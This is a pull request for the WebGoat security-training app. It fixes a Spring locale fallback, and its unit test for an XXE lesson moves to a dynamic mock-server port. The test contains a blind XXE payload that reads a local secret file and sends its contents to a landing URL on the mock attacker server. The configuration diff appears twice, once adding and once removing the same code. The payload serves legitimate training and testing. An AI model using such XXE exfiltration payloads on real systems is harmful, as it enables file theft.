### PR TITLE
unit test related fixes for i18n and available ports

### DIFF
--- a/webgoat-container/src/main/java/org/owasp/webgoat/MvcConfiguration.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/MvcConfiguration.java
@@ -43,9 +43,11 @@ import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
 import org.springframework.core.io.ResourceLoader;
 import org.springframework.web.servlet.LocaleResolver;
+import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
 import org.springframework.web.servlet.config.annotation.ResourceHandlerRegistry;
 import org.springframework.web.servlet.config.annotation.ViewControllerRegistry;
 import org.springframework.web.servlet.config.annotation.WebMvcConfigurerAdapter;
+import org.springframework.web.servlet.i18n.LocaleChangeInterceptor;
 import org.springframework.web.servlet.i18n.SessionLocaleResolver;
 import org.thymeleaf.extras.springsecurity4.dialect.SpringSecurityDialect;
 import org.thymeleaf.spring4.SpringTemplateEngine;
@@ -53,6 +55,7 @@ import org.thymeleaf.spring4.templateresolver.SpringResourceTemplateResolver;
 import org.thymeleaf.templateresolver.TemplateResolver;
 
 import java.io.File;
+import java.util.Locale;
 
 /**
  * Configuration for Spring MVC
@@ -145,13 +148,22 @@ public class MvcConfiguration extends WebMvcConfigurerAdapter {
         Messages messages = new Messages(language);
         messages.setDefaultEncoding("UTF-8");
         messages.setBasename("classpath:i18n/messages");
+        messages.setFallbackToSystemLocale(false);
         return messages;
     }
 
     @Bean
     public LocaleResolver localeResolver() {
         SessionLocaleResolver slr = new SessionLocaleResolver();
+        slr.setDefaultLocale(Locale.ENGLISH);
         return slr;
+    }
+    
+    @Bean
+    public LocaleChangeInterceptor localeChangeInterceptor() {
+        LocaleChangeInterceptor lci = new LocaleChangeInterceptor();
+        lci.setParamName("lang");
+        return lci;
     }
 
     @Bean
@@ -159,4 +171,9 @@ public class MvcConfiguration extends WebMvcConfigurerAdapter {
         return new LabelDebugger();
     }
 
+    @Override
+    public void addInterceptors(InterceptorRegistry registry) {
+        registry.addInterceptor(localeChangeInterceptor());
+    }
+    
 }

--- a/webgoat-container/src/main/java/org/owasp/webgoat/MvcConfiguration.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/MvcConfiguration.java
@@ -34,7 +34,6 @@ import com.google.common.collect.Sets;
 import org.owasp.webgoat.i18n.Language;
 import org.owasp.webgoat.i18n.Messages;
 import org.owasp.webgoat.i18n.PluginMessages;
-import org.owasp.webgoat.session.Course;
 import org.owasp.webgoat.session.LabelDebugger;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.beans.factory.annotation.Qualifier;
@@ -43,11 +42,9 @@ import org.springframework.context.annotation.Bean;
 import org.springframework.context.annotation.Configuration;
 import org.springframework.core.io.ResourceLoader;
 import org.springframework.web.servlet.LocaleResolver;
-import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
 import org.springframework.web.servlet.config.annotation.ResourceHandlerRegistry;
 import org.springframework.web.servlet.config.annotation.ViewControllerRegistry;
 import org.springframework.web.servlet.config.annotation.WebMvcConfigurerAdapter;
-import org.springframework.web.servlet.i18n.LocaleChangeInterceptor;
 import org.springframework.web.servlet.i18n.SessionLocaleResolver;
 import org.thymeleaf.extras.springsecurity4.dialect.SpringSecurityDialect;
 import org.thymeleaf.spring4.SpringTemplateEngine;
@@ -55,7 +52,6 @@ import org.thymeleaf.spring4.templateresolver.SpringResourceTemplateResolver;
 import org.thymeleaf.templateresolver.TemplateResolver;
 
 import java.io.File;
-import java.util.Locale;
 
 /**
  * Configuration for Spring MVC
@@ -155,25 +151,12 @@ public class MvcConfiguration extends WebMvcConfigurerAdapter {
     @Bean
     public LocaleResolver localeResolver() {
         SessionLocaleResolver slr = new SessionLocaleResolver();
-        slr.setDefaultLocale(Locale.ENGLISH);
         return slr;
     }
     
-    @Bean
-    public LocaleChangeInterceptor localeChangeInterceptor() {
-        LocaleChangeInterceptor lci = new LocaleChangeInterceptor();
-        lci.setParamName("lang");
-        return lci;
-    }
-
     @Bean
     public LabelDebugger labelDebugger() {
         return new LabelDebugger();
     }
 
-    @Override
-    public void addInterceptors(InterceptorRegistry registry) {
-        registry.addInterceptor(localeChangeInterceptor());
-    }
-    
 }

--- a/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java
+++ b/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java
@@ -18,6 +18,7 @@ import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 import java.io.File;
 import java.util.List;
 
+import static com.github.tomakehurst.wiremock.core.WireMockConfiguration.wireMockConfig;
 import static com.github.tomakehurst.wiremock.client.WireMock.*;
 import static org.assertj.core.api.Assertions.assertThat;
 import static org.mockito.Mockito.when;
@@ -35,9 +36,11 @@ public class BlindSendFileAssignmentTest extends LessonTest {
     private Comments comments;
     @Value("${webgoat.user.directory}")
     private String webGoatHomeDirectory;
+    
+    private int port;
 
     @Rule
-    public WireMockRule webwolfServer = new WireMockRule(9090);
+    public WireMockRule webwolfServer = new WireMockRule(wireMockConfig().dynamicPort());
 
     @Before
     public void setup() throws Exception {
@@ -45,6 +48,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
         when(webSession.getCurrentLesson()).thenReturn(xxe);
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
         when(webSession.getUserName()).thenReturn("unit-test");
+        port = webwolfServer.port();
     }
 
     @Test
@@ -74,7 +78,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
         //Host DTD on WebWolf site
         String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
                 "<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
-                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:9090/landing?text=%file;'>\">\n" +
+                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:"+port+"/landing?text=%file;'>\">\n" +
                 "%all;";
         webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd"))
                 .willReturn(aResponse()
@@ -85,7 +89,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
         //Make the request from WebGoat
         String xml = "<?xml version=\"1.0\"?>" +
                 "<!DOCTYPE comment [" +
-                "<!ENTITY % remote SYSTEM \"http://localhost:9090/files/test.dtd\">" +
+                "<!ENTITY % remote SYSTEM \"http://localhost:"+port+"/files/test.dtd\">" +
                 "%remote;" +
                 "]>" +
                 "<comment><text>test&send;</text></comment>";
@@ -97,7 +101,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
         File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
         //Host DTD on WebWolf site
         String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
-                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:9090/landing?text=%file;'>\">\n";
+                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:"+port+"/landing?text=%file;'>\">\n";
         webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd"))
                 .willReturn(aResponse()
                         .withStatus(200)
@@ -108,7 +112,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
         String xml = "<?xml version=\"1.0\"?>" +
                 "<!DOCTYPE comment [" +
                 "<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
-                "<!ENTITY % remote SYSTEM \"http://localhost:9090/files/test.dtd\">" +
+                "<!ENTITY % remote SYSTEM \"http://localhost:"+port+"/files/test.dtd\">" +
                 "%remote;" +
                 "%all;" +
                 "]>" +


### PR DESCRIPTION
As I was interested in contributing, I started by cloning the repository and trying to build all code.
I found that there are unit test failures when the OS language is not English and when port 9090 is used. 
In this pull request, I made a change to the i18n set up of WebGoat so it will not fall back to default OS language. Which I think is the intended idea and solves that unit test failure.
In the XXE module, a hardcoded port number was used for the unit test, which can fail the build if the port is used. I changed this to take a dynamically available port.
With these two changes the unit tests all work.